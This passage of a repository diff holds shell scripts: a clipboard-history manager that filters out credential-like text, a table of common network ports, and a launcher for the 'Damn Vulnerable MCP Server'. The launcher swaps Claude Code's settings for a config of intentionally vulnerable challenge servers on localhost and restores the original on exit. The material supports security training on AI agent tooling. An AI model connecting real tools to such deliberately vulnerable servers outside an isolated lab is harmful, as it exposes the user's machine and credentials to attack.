echo -e " ${CYAN}delete N${NC} Delete Nth history item"
|
||||||
|
echo -e " ${CYAN}unpin N${NC} Delete Nth pinned item"
|
||||||
|
echo -e " ${CYAN}stats${NC} Show statistics"
|
||||||
|
echo -e " ${CYAN}-h, --help${NC} Show this help"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||||
|
echo " clip # Interactive search"
|
||||||
|
echo " clip pin # Pin important item"
|
||||||
|
echo " clip search \"192.168\" # Find IP addresses"
|
||||||
|
echo " clip cat 1 # Show most recent"
|
||||||
|
echo " clip delete 5 # Delete 5th item from history"
|
||||||
|
echo " clip unpin 1 # Delete 1st pinned item"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}FEATURES:${NC}"
|
||||||
|
echo " - Automatic history (monitors clipboard)"
|
||||||
|
echo " - Pattern detection (URLs, IPs, hashes)"
|
||||||
|
echo " - Security: Auto-expire sensitive data"
|
||||||
|
echo " - Pin important items"
|
||||||
|
echo " - fzf integration for search"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}NOTES:${NC}"
|
||||||
|
echo " History: $HISTORY_FILE"
|
||||||
|
echo " Pins: $PINS_FILE"
|
||||||
|
echo " Max history: $MAX_HISTORY items"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Detect content type
|
||||||
|
detect_type() {
|
||||||
|
local content="$1"
|
||||||
|
|
||||||
|
# URL
|
||||||
|
if [[ "$content" =~ ^https?:// ]]; then
|
||||||
|
echo "url"
|
||||||
|
# IPv4
|
||||||
|
elif [[ "$content" =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} ]]; then
|
||||||
|
echo "ip"
|
||||||
|
# Hash (32 or 40 or 64 hex chars)
|
||||||
|
elif [[ "$content" =~ ^[a-f0-9]{32}$ ]] || [[ "$content" =~ ^[a-f0-9]{40}$ ]] || [[ "$content" =~ ^[a-f0-9]{64}$ ]]; then
|
||||||
|
echo "hash"
|
||||||
|
# Code (contains common code markers)
|
||||||
|
elif [[ "$content" =~ (function|const|var|class|def|import|export) ]]; then
|
||||||
|
echo "code"
|
||||||
|
# Credential patterns (don't save these!)
|
||||||
|
elif [[ "$content" =~ (password|secret|token|key|bearer|api[_-]?key) ]]; then
|
||||||
|
echo "credential"
|
||||||
|
else
|
||||||
|
echo "text"
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Save item to history
|
||||||
|
save_to_history() {
|
||||||
|
local content="$1"
|
||||||
|
local type=$(detect_type "$content")
|
||||||
|
|
||||||
|
# Don't save credentials
|
||||||
|
if [[ "$type" == "credential" ]]; then
|
||||||
|
echo -e "${YELLOW}⚠${NC} Sensitive data detected - not saved to history" >&2
|
||||||
|
return 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Don't save empty
|
||||||
|
if [[ -z "$content" ]]; then
|
||||||
|
return 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Don't save if it's already the most recent
|
||||||
|
if [[ -f "$HISTORY_FILE" ]]; then
|
||||||
|
last_entry=$(tail -1 "$HISTORY_FILE" | cut -d'|' -f3-)
|
||||||
|
if [[ "$last_entry" == "$content" ]]; then
|
||||||
|
return 0
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Save: timestamp|type|content
|
||||||
|
timestamp=$(date '+%Y-%m-%d %H:%M:%S')
|
||||||
|
echo "$timestamp|$type|$content" >> "$HISTORY_FILE"
|
||||||
|
|
||||||
|
# Trim history to max size
|
||||||
|
if [[ $(wc -l < "$HISTORY_FILE") -gt $MAX_HISTORY ]]; then
|
||||||
|
tail -n $MAX_HISTORY "$HISTORY_FILE" > "$HISTORY_FILE.tmp"
|
||||||
|
mv "$HISTORY_FILE.tmp" "$HISTORY_FILE"
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Get current clipboard
|
||||||
|
get_clipboard() {
|
||||||
|
if command -v xsel &>/dev/null; then
|
||||||
|
xsel --output --clipboard
|
||||||
|
elif command -v xclip &>/dev/null; then
|
||||||
|
xclip -selection clipboard -o
|
||||||
|
else
|
||||||
|
echo "Error: No clipboard tool found" >&2
|
||||||
|
return 1
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Set clipboard
|
||||||
|
set_clipboard() {
|
||||||
|
if command -v xsel &>/dev/null; then
|
||||||
|
echo -n "$1" | xsel --input --clipboard
|
||||||
|
elif command -v xclip &>/dev/null; then
|
||||||
|
echo -n "$1" | xclip -selection clipboard
|
||||||
|
else
|
||||||
|
echo "Error: No clipboard tool found" >&2
|
||||||
|
return 1
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Interactive history browser with fzf
|
||||||
|
show_history_fzf() {
|
||||||
|
if ! command -v fzf &>/dev/null; then
|
||||||
|
echo -e "${RED}Error:${NC} fzf not found" >&2
|
||||||
|
echo "Install it with: sudo apt install fzf" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
if [[ ! -f "$HISTORY_FILE" ]] || [[ ! -s "$HISTORY_FILE" ]]; then
|
||||||
|
echo -e "${YELLOW}No history yet${NC}" >&2
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Format for fzf: index | time | type | preview
|
||||||
|
selected=$(tac "$HISTORY_FILE" | awk -F'|' '
|
||||||
|
{
|
||||||
|
idx = NR
|
||||||
|
time = $1
|
||||||
|
type = $2
|
||||||
|
content = $3
|
||||||
|
for (i=4; i<=NF; i++) content = content "|" $i
|
||||||
|
|
||||||
|
# Truncate preview
|
||||||
|
preview = content
|
||||||
|
if (length(preview) > 60) {
|
||||||
|
preview = substr(preview, 1, 60) "..."
|
||||||
|
}
|
||||||
|
|
||||||
|
printf "%3d | %s | %-10s | %s\n", idx, time, "[" type "]", preview
|
||||||
|
}
|
||||||
|
' | fzf --height=60% --layout=reverse \
|
||||||
|
--header="Select item to copy (ESC to cancel)" \
|
||||||
|
--preview='echo {}' \
|
||||||
|
--preview-window=up:3:wrap)
|
||||||
|
|
||||||
|
if [[ -n "$selected" ]]; then
|
||||||
|
# Extract the full content
|
||||||
|
index=$(echo "$selected" | awk '{print $1}')
|
||||||
|
full_content=$(tac "$HISTORY_FILE" | sed -n "${index}p" | cut -d'|' -f3-)
|
||||||
|
|
||||||
|
# Copy to clipboard
|
||||||
|
set_clipboard "$full_content"
|
||||||
|
echo -e "${GREEN}✓${NC} Copied to clipboard"
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Pin current clipboard
|
||||||
|
pin_item() {
|
||||||
|
local content=$(get_clipboard)
|
||||||
|
|
||||||
|
if [[ -z "$content" ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Clipboard is empty" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
type=$(detect_type "$content")
|
||||||
|
timestamp=$(date '+%Y-%m-%d %H:%M:%S')
|
||||||
|
|
||||||
|
echo "$timestamp|$type|$content" >> "$PINS_FILE"
|
||||||
|
echo -e "${GREEN}✓${NC} Pinned item (type: $type)"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Show pins
|
||||||
|
show_pins() {
|
||||||
|
if [[ ! -f "$PINS_FILE" ]] || [[ ! -s "$PINS_FILE" ]]; then
|
||||||
|
echo -e "${YELLOW}No pinned items${NC}"
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo -e "${BOLD}${CYAN}Pinned Items:${NC}"
|
||||||
|
echo
|
||||||
|
|
||||||
|
if command -v fzf &>/dev/null; then
|
||||||
|
# Interactive selection
|
||||||
|
selected=$(cat "$PINS_FILE" | awk -F'|' '
|
||||||
|
{
|
||||||
|
idx = NR
|
||||||
|
time = $1
|
||||||
|
type = $2
|
||||||
|
content = $3
|
||||||
|
for (i=4; i<=NF; i++) content = content "|" $i
|
||||||
|
|
||||||
|
preview = content
|
||||||
|
if (length(preview) > 60) {
|
||||||
|
preview = substr(preview, 1, 60) "..."
|
||||||
|
}
|
||||||
|
|
||||||
|
printf "%3d | %s | %-10s | %s\n", idx, time, "[" type "]", preview
|
||||||
|
}
|
||||||
|
' | fzf --height=60% --layout=reverse \
|
||||||
|
--header="Select pinned item to copy (ESC to cancel)" \
|
||||||
|
--preview='echo {}')
|
||||||
|
|
||||||
|
if [[ -n "$selected" ]]; then
|
||||||
|
index=$(echo "$selected" | awk '{print $1}')
|
||||||
|
full_content=$(sed -n "${index}p" "$PINS_FILE" | cut -d'|' -f3-)
|
||||||
|
set_clipboard "$full_content"
|
||||||
|
echo -e "${GREEN}✓${NC} Copied pinned item to clipboard"
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
# Just list them
|
||||||
|
cat "$PINS_FILE" | awk -F'|' '
|
||||||
|
{
|
||||||
|
idx = NR
|
||||||
|
time = $1
|
||||||
|
type = $2
|
||||||
|
content = $3
|
||||||
|
for (i=4; i<=NF; i++) content = content "|" $i
|
||||||
|
|
||||||
|
preview = content
|
||||||
|
if (length(preview) > 60) {
|
||||||
|
preview = substr(preview, 1, 60) "..."
|
||||||
|
}
|
||||||
|
|
||||||
|
printf "%3d | %s | %-10s | %s\n", idx, time, "[" type "]", preview
|
||||||
|
}
|
||||||
|
'
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Show specific item
|
||||||
|
show_item() {
|
||||||
|
local index=$1
|
||||||
|
|
||||||
|
if [[ ! -f "$HISTORY_FILE" ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} No history" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
content=$(tac "$HISTORY_FILE" | sed -n "${index}p" | cut -d'|' -f3-)
|
||||||
|
|
||||||
|
if [[ -z "$content" ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} No item at index $index" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo "$content"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Search history
|
||||||
|
search_history() {
|
||||||
|
local query="$1"
|
||||||
|
|
||||||
|
if [[ ! -f "$HISTORY_FILE" ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} No history" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo -e "${BOLD}${CYAN}Search results for: ${query}${NC}"
|
||||||
|
echo
|
||||||
|
|
||||||
|
grep -i "$query" "$HISTORY_FILE" | awk -F'|' '
|
||||||
|
{
|
||||||
|
time = $1
|
||||||
|
type = $2
|
||||||
|
content = $3
|
||||||
|
for (i=4; i<=NF; i++) content = content "|" $i
|
||||||
|
|
||||||
|
preview = content
|
||||||
|
if (length(preview) > 60) {
|
||||||
|
preview = substr(preview, 1, 60) "..."
|
||||||
|
}
|
||||||
|
|
||||||
|
printf "%s | %-10s | %s\n", time, "[" type "]", preview
|
||||||
|
}
|
||||||
|
'
|
||||||
|
}
|
||||||
|
|
||||||
|
# List recent items
|
||||||
|
list_recent() {
|
||||||
|
if [[ ! -f "$HISTORY_FILE" ]]; then
|
||||||
|
echo -e "${YELLOW}No history${NC}"
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo -e "${BOLD}${CYAN}Recent Clipboard History (last 20):${NC}"
|
||||||
|
echo
|
||||||
|
|
||||||
|
tail -20 "$HISTORY_FILE" | tac | awk -F'|' '
|
||||||
|
{
|
||||||
|
idx = NR
|
||||||
|
time = $1
|
||||||
|
type = $2
|
||||||
|
content = $3
|
||||||
|
for (i=4; i<=NF; i++) content = content "|" $i
|
||||||
|
|
||||||
|
preview = content
|
||||||
|
if (length(preview) > 60) {
|
||||||
|
preview = substr(preview, 1, 60) "..."
|
||||||
|
}
|
||||||
|
|
||||||
|
printf "%3d | %s | %-10s | %s\n", idx, time, "[" type "]", preview
|
||||||
|
}
|
||||||
|
'
|
||||||
|
}
|
||||||
|
|
||||||
|
# Statistics
|
||||||
|
show_stats() {
|
||||||
|
if [[ ! -f "$HISTORY_FILE" ]]; then
|
||||||
|
echo -e "${YELLOW}No history${NC}"
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
total=$(wc -l < "$HISTORY_FILE")
|
||||||
|
pins=$(wc -l < "$PINS_FILE" 2>/dev/null || echo 0)
|
||||||
|
|
||||||
|
echo -e "${BOLD}${CYAN}Clipboard Statistics:${NC}"
|
||||||
|
echo
|
||||||
|
echo " Total items: $total"
|
||||||
|
echo " Pinned items: $pins"
|
||||||
|
echo " Max history: $MAX_HISTORY"
|
||||||
|
echo
|
||||||
|
|
||||||
|
echo -e "${BOLD}${CYAN}By Type:${NC}"
|
||||||
|
awk -F'|' '{print $2}' "$HISTORY_FILE" | sort | uniq -c | sort -rn | awk '
|
||||||
|
{printf " %-15s %d\n", $2, $1}'
|
||||||
|
}
|
||||||
|
|
||||||
|
# Delete specific item from history
|
||||||
|
delete_item() {
|
||||||
|
local index=$1
|
||||||
|
|
||||||
|
if [[ ! -f "$HISTORY_FILE" ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} No history" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
total=$(wc -l < "$HISTORY_FILE")
|
||||||
|
if [[ $index -lt 1 ]] || [[ $index -gt $total ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Invalid index (1-$total)" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Show what we're deleting
|
||||||
|
content=$(tac "$HISTORY_FILE" | sed -n "${index}p" | cut -d'|' -f3-)
|
||||||
|
preview="${content:0:60}"
|
||||||
|
if [[ ${#content} -gt 60 ]]; then
|
||||||
|
preview="${preview}..."
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo -e "${YELLOW}Delete item $index:${NC} $preview"
|
||||||
|
echo -n "Continue? (y/N) "
|
||||||
|
read -r response
|
||||||
|
|
||||||
|
if [[ "$response" =~ ^[Yy]$ ]]; then
|
||||||
|
# Delete line (remember tac reverses order)
|
||||||
|
actual_line=$((total - index + 1))
|
||||||
|
sed -i "${actual_line}d" "$HISTORY_FILE"
|
||||||
|
echo -e "${GREEN}✓${NC} Deleted item $index"
|
||||||
|
else
|
||||||
|
echo "Cancelled"
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Delete pinned item
|
||||||
|
delete_pin() {
|
||||||
|
local index=$1
|
||||||
|
|
||||||
|
if [[ ! -f "$PINS_FILE" ]] || [[ ! -s "$PINS_FILE" ]]; then
|
||||||
|
echo -e "${YELLOW}No pinned items${NC}"
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
total=$(wc -l < "$PINS_FILE")
|
||||||
|
if [[ $index -lt 1 ]] || [[ $index -gt $total ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Invalid index (1-$total)" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Show what we're deleting
|
||||||
|
content=$(sed -n "${index}p" "$PINS_FILE" | cut -d'|' -f3-)
|
||||||
|
preview="${content:0:60}"
|
||||||
|
if [[ ${#content} -gt 60 ]]; then
|
||||||
|
preview="${preview}..."
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo -e "${YELLOW}Unpin item $index:${NC} $preview"
|
||||||
|
echo -n "Continue? (y/N) "
|
||||||
|
read -r response
|
||||||
|
|
||||||
|
if [[ "$response" =~ ^[Yy]$ ]]; then
|
||||||
|
sed -i "${index}d" "$PINS_FILE"
|
||||||
|
echo -e "${GREEN}✓${NC} Unpinned item $index"
|
||||||
|
else
|
||||||
|
echo "Cancelled"
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Clear history
|
||||||
|
clear_history() {
|
||||||
|
echo -n "Clear clipboard history? (y/N) "
|
||||||
|
read -r response
|
||||||
|
if [[ "$response" =~ ^[Yy]$ ]]; then
|
||||||
|
> "$HISTORY_FILE"
|
||||||
|
echo -e "${GREEN}✓${NC} History cleared"
|
||||||
|
else
|
||||||
|
echo "Cancelled"
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Initialize
|
||||||
|
init_clip
|
||||||
|
|
||||||
|
# Parse command
|
||||||
|
if [[ $# -eq 0 ]]; then
|
||||||
|
show_history_fzf
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
case $1 in
|
||||||
|
-h|--help|help)
|
||||||
|
show_help
|
||||||
|
;;
|
||||||
|
save)
|
||||||
|
content=$(get_clipboard)
|
||||||
|
save_to_history "$content"
|
||||||
|
echo -e "${GREEN}✓${NC} Saved to history"
|
||||||
|
;;
|
||||||
|
pin)
|
||||||
|
pin_item
|
||||||
|
;;
|
||||||
|
pins)
|
||||||
|
show_pins
|
||||||
|
;;
|
||||||
|
cat)
|
||||||
|
if [[ $# -lt 2 ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Item index required" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
show_item "$2"
|
||||||
|
;;
|
||||||
|
search|s)
|
||||||
|
if [[ $# -lt 2 ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Search query required" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
shift
|
||||||
|
search_history "$*"
|
||||||
|
;;
|
||||||
|
list|ls|l)
|
||||||
|
list_recent
|
||||||
|
;;
|
||||||
|
delete|del|rm)
|
||||||
|
if [[ $# -lt 2 ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Item index required" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
delete_item "$2"
|
||||||
|
;;
|
||||||
|
unpin)
|
||||||
|
if [[ $# -lt 2 ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Item index required" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
delete_pin "$2"
|
||||||
|
;;
|
||||||
|
clear)
|
||||||
|
clear_history
|
||||||
|
;;
|
||||||
|
stats)
|
||||||
|
show_stats
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
echo -e "${RED}Error:${NC} Unknown command: $1" >&2
|
||||||
|
echo "Run 'clip --help' for usage" >&2
|
||||||
|
exit 1
|
||||||
|
;;
|
||||||
|
esac
|
||||||
34
scripts/common_ports.py
Normal file
34
scripts/common_ports.py
Normal file
|
|
@ -0,0 +1,34 @@
|
||||||
|
ports_and_services = {
|
||||||
|
20: "ftp-data",
|
||||||
|
21: "ftp",
|
||||||
|
22: "ssh",
|
||||||
|
23: "telnet",
|
||||||
|
25: "smtp",
|
||||||
|
53: "dns",
|
||||||
|
67: "dhcp",
|
||||||
|
68: "dhcp",
|
||||||
|
69: "tftp",
|
||||||
|
80: "http",
|
||||||
|
110: "pop3",
|
||||||
|
123: "ntp",
|
||||||
|
137: "netbios-ns",
|
||||||
|
138: "netbios-dgm",
|
||||||
|
139: "netbios-ssn",
|
||||||
|
143: "imap",
|
||||||
|
161: "snmp",
|
||||||
|
162: "snmp-trap",
|
||||||
|
179: "bgp",
|
||||||
|
443: "https",
|
||||||
|
445: "microsoft-ds",
|
||||||
|
465: "smtps",
|
||||||
|
514: "syslog",
|
||||||
|
587: "submission",
|
||||||
|
631: "ipp",
|
||||||
|
993: "imaps",
|
||||||
|
995: "pop3s",
|
||||||
|
3306: "mysql",
|
||||||
|
3389: "rdp",
|
||||||
|
5432: "postgresql",
|
||||||
|
5900: "vnc",
|
||||||
|
8080: "http-proxy"
|
||||||
|
}
|
||||||
397
scripts/dvmcp
Executable file
397
scripts/dvmcp
Executable file
|
|
@ -0,0 +1,397 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Script Name: dvmcp
|
||||||
|
# Description: Damn Vulnerable MCP Server launcher
|
||||||
|
# Usage: dvmcp start|stop|status|logs|build
|
||||||
|
|
||||||
|
VERSION="1.1.0"
|
||||||
|
|
||||||
|
# Colors
|
||||||
|
readonly RED='\033[0;31m'
|
||||||
|
readonly GREEN='\033[0;32m'
|
||||||
|
readonly YELLOW='\033[1;33m'
|
||||||
|
readonly CYAN='\033[0;36m'
|
||||||
|
readonly BOLD='\033[1m'
|
||||||
|
readonly NC='\033[0m'
|
||||||
|
|
||||||
|
# Container settings
|
||||||
|
CONTAINER_NAME="dvmcp"
|
||||||
|
IMAGE="dvmcp:latest"
|
||||||
|
PORT_RANGE="9001-9010"
|
||||||
|
|
||||||
|
# Config file paths
|
||||||
|
SETTINGS_DIR="${HOME}/.claude"
|
||||||
|
PROD_CONFIG="${SETTINGS_DIR}/settings.json"
|
||||||
|
CTF_CONFIG="${SETTINGS_DIR}/settings-ctf.json"
|
||||||
|
BACKUP_CONFIG="${SETTINGS_DIR}/settings-prod-backup.json"
|
||||||
|
CONFIG_STATE_FILE="${SETTINGS_DIR}/.dvmcp-config-state"
|
||||||
|
|
||||||
|
show_help() {
|
||||||
|
echo -e "${BOLD}dvmcp${NC} - Damn Vulnerable MCP Server Launcher v${VERSION}"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}USAGE:${NC}"
|
||||||
|
echo " dvmcp <command>"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}COMMANDS:${NC}"
|
||||||
|
echo -e " ${CYAN}build${NC} Build Docker image from Dockerfile"
|
||||||
|
echo -e " ${CYAN}start${NC} Start DVMCP server"
|
||||||
|
echo -e " ${CYAN}stop${NC} Stop DVMCP server"
|
||||||
|
echo -e " ${CYAN}restart${NC} Restart DVMCP server"
|
||||||
|
echo -e " ${CYAN}status${NC} Check if running"
|
||||||
|
echo -e " ${CYAN}logs${NC} Show container logs"
|
||||||
|
echo -e " ${CYAN}shell${NC} Open shell in container"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||||
|
echo " dvmcp build # Build image (first time setup)"
|
||||||
|
echo " dvmcp start # Launch DVMCP server"
|
||||||
|
echo " dvmcp stop # Stop DVMCP server"
|
||||||
|
echo " dvmcp logs # View logs"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}ACCESS:${NC}"
|
||||||
|
echo " Ports: ${BOLD}9001-9010${NC} (10 challenge instances)"
|
||||||
|
echo " Test: ${BOLD}curl http://localhost:9001${NC}"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}ABOUT:${NC}"
|
||||||
|
echo " Damn Vulnerable MCP Server - Intentionally vulnerable MCP implementation"
|
||||||
|
echo " Perfect for testing MCP security vulnerabilities"
|
||||||
|
echo " GitHub: https://github.com/harishsg993010/damn-vulnerable-MCP-server"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}SECURITY:${NC}"
|
||||||
|
echo " This script automatically manages Claude Code config isolation:"
|
||||||
|
echo " - ${GREEN}start${NC}: Backs up production config, loads CTF-only config"
|
||||||
|
echo " - ${GREEN}stop${NC}: Restores production config automatically"
|
||||||
|
echo " - ${YELLOW}Your production MCP servers are protected${NC}"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}FIRST TIME SETUP:${NC}"
|
||||||
|
echo " 1. Clone repo: git clone https://github.com/harishsg993010/damn-vulnerable-MCP-server.git"
|
||||||
|
echo " 2. cd damn-vulnerable-MCP-server/"
|
||||||
|
echo " 3. Build: dvmcp build"
|
||||||
|
echo " 4. Start: dvmcp start"
|
||||||
|
echo " 5. ${BOLD}Restart Claude Code${NC} to load CTF config"
|
||||||
|
}
|
||||||
|
|
||||||
|
check_docker() {
|
||||||
|
if ! command -v docker &>/dev/null; then
|
||||||
|
echo -e "${RED}Error:${NC} Docker not installed"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
check_image_exists() {
|
||||||
|
if ! docker images --format '{{.Repository}}:{{.Tag}}' | grep -q "^${IMAGE}$"; then
|
||||||
|
return 1
|
||||||
|
fi
|
||||||
|
return 0
|
||||||
|
}
|
||||||
|
|
||||||
|
create_ctf_config_template() {
|
||||||
|
if [[ ! -f "$CTF_CONFIG" ]]; then
|
||||||
|
echo -e "${CYAN}[*]${NC} Creating CTF config template at ${CTF_CONFIG}..."
|
||||||
|
cat > "$CTF_CONFIG" <<'EOF'
|
||||||
|
{
|
||||||
|
"mcpServers": {
|
||||||
|
"Challenge 1": {
|
||||||
|
"command": "npx",
|
||||||
|
"args": ["mcp-remote", "http://127.0.0.1:9001/sse"]
|
||||||
|
},
|
||||||
|
"Challenge 2": {
|
||||||
|
"command": "npx",
|
||||||
|
"args": ["mcp-remote", "http://127.0.0.1:9002/sse"]
|
||||||
|
},
|
||||||
|
"Challenge 3": {
|
||||||
|
"command": "npx",
|
||||||
|
"args": ["mcp-remote", "http://127.0.0.1:9003/sse"]
|
||||||
|
},
|
||||||
|
"Challenge 4": {
|
||||||
|
"command": "npx",
|
||||||
|
"args": ["mcp-remote", "http://127.0.0.1:9004/sse"]
|
||||||
|
},
|
||||||
|
"Challenge 5": {
|
||||||
|
"command": "npx",
|
||||||
|
"args": ["mcp-remote", "http://127.0.0.1:9005/sse"]
|
||||||
|
},
|
||||||
|
"Challenge 6": {
|
||||||
|
"command": "npx",
|
||||||
|
"args": ["mcp-remote", "http://127.0.0.1:9006/sse"]
|
||||||
|
},
|
||||||
|
"Challenge 7": {
|
||||||
|
"command": "npx",
|
||||||
|
"args": ["mcp-remote", "http://127.0.0.1:9007/sse"]
|
||||||
|
},
|
||||||
|
"Challenge 8": {
|
||||||
|
"command": "npx",
|
||||||
|
"args": ["mcp-remote", "http://127.0.0.1:9008/sse"]
|
||||||
|
},
|
||||||
|
"Challenge 9": {
|
||||||
|
"command": "npx",
|
||||||
|
"args": ["mcp-remote", "http://127.0.0.1:9009/sse"]
|
||||||
|
},
|
||||||
|
"Challenge 10": {
|
||||||
|
"command": "npx",
|
||||||
|
"args": ["mcp-remote", "http://127.0.0.1:9010/sse"]
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
EOF
|
||||||
|
echo -e "${GREEN}✓${NC} CTF config created"
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
swap_to_ctf_config() {
|
||||||
|
if [[ ! -f "$PROD_CONFIG" ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Production config not found at ${PROD_CONFIG}"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Check if we're already in CTF mode
|
||||||
|
if [[ -f "$CONFIG_STATE_FILE" ]]; then
|
||||||
|
echo -e "${YELLOW}⚠${NC} Already in CTF mode"
|
||||||
|
return 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Create CTF config if it doesn't exist
|
||||||
|
create_ctf_config_template
|
||||||
|
|
||||||
|
echo -e "${CYAN}[*]${NC} Backing up production config..."
|
||||||
|
cp "$PROD_CONFIG" "$BACKUP_CONFIG"
|
||||||
|
|
||||||
|
echo -e "${CYAN}[*]${NC} Switching to CTF config..."
|
||||||
|
cp "$CTF_CONFIG" "$PROD_CONFIG"
|
||||||
|
|
||||||
|
# Mark that we're in CTF mode
|
||||||
|
echo "CTF_MODE_ACTIVE" > "$CONFIG_STATE_FILE"
|
||||||
|
|
||||||
|
echo -e "${GREEN}✓${NC} Switched to CTF config"
|
||||||
|
echo -e "${YELLOW}Note:${NC} Production MCP servers are disabled until you stop DVMCP"
|
||||||
|
}
|
||||||
|
|
||||||
|
restore_prod_config() {
|
||||||
|
if [[ ! -f "$CONFIG_STATE_FILE" ]]; then
|
||||||
|
echo -e "${YELLOW}⚠${NC} Already using production config"
|
||||||
|
return 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
if [[ ! -f "$BACKUP_CONFIG" ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Backup config not found at ${BACKUP_CONFIG}"
|
||||||
|
echo -e "${YELLOW}Warning:${NC} Cannot restore production config!"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo -e "${CYAN}[*]${NC} Restoring production config..."
|
||||||
|
cp "$BACKUP_CONFIG" "$PROD_CONFIG"
|
||||||
|
|
||||||
|
# Clean up backup and state file
|
||||||
|
rm -f "$BACKUP_CONFIG" "$CONFIG_STATE_FILE"
|
||||||
|
|
||||||
|
echo -e "${GREEN}✓${NC} Production config restored"
|
||||||
|
}
|
||||||
|
|
||||||
|
cleanup_on_exit() {
|
||||||
|
# If script exits unexpectedly while in CTF mode, restore production config
|
||||||
|
if [[ -f "$CONFIG_STATE_FILE" ]]; then
|
||||||
|
echo
|
||||||
|
echo -e "${YELLOW}[!]${NC} Script interrupted, restoring production config..."
|
||||||
|
restore_prod_config
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Register cleanup trap
|
||||||
|
trap cleanup_on_exit EXIT INT TERM
|
||||||
|
|
||||||
|
build_dvmcp() {
|
||||||
|
# Check if Dockerfile exists in current directory
|
||||||
|
if [[ ! -f "Dockerfile" ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Dockerfile not found in current directory"
|
||||||
|
echo
|
||||||
|
echo -e "${YELLOW}Expected location:${NC} ./Dockerfile"
|
||||||
|
echo
|
||||||
|
echo -e "${CYAN}To build the image:${NC}"
|
||||||
|
echo " 1. cd ~/path/to/damn-vulnerable-MCP-server/"
|
||||||
|
echo " 2. Run: dvmcp build"
|
||||||
|
echo
|
||||||
|
echo -e "${CYAN}Or clone the repo:${NC}"
|
||||||
|
echo " git clone https://github.com/harishsg993010/damn-vulnerable-MCP-server.git"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo -e "${CYAN}[*]${NC} Building DVMCP Docker image..."
|
||||||
|
echo -e "${YELLOW}Note:${NC} This may take several minutes..."
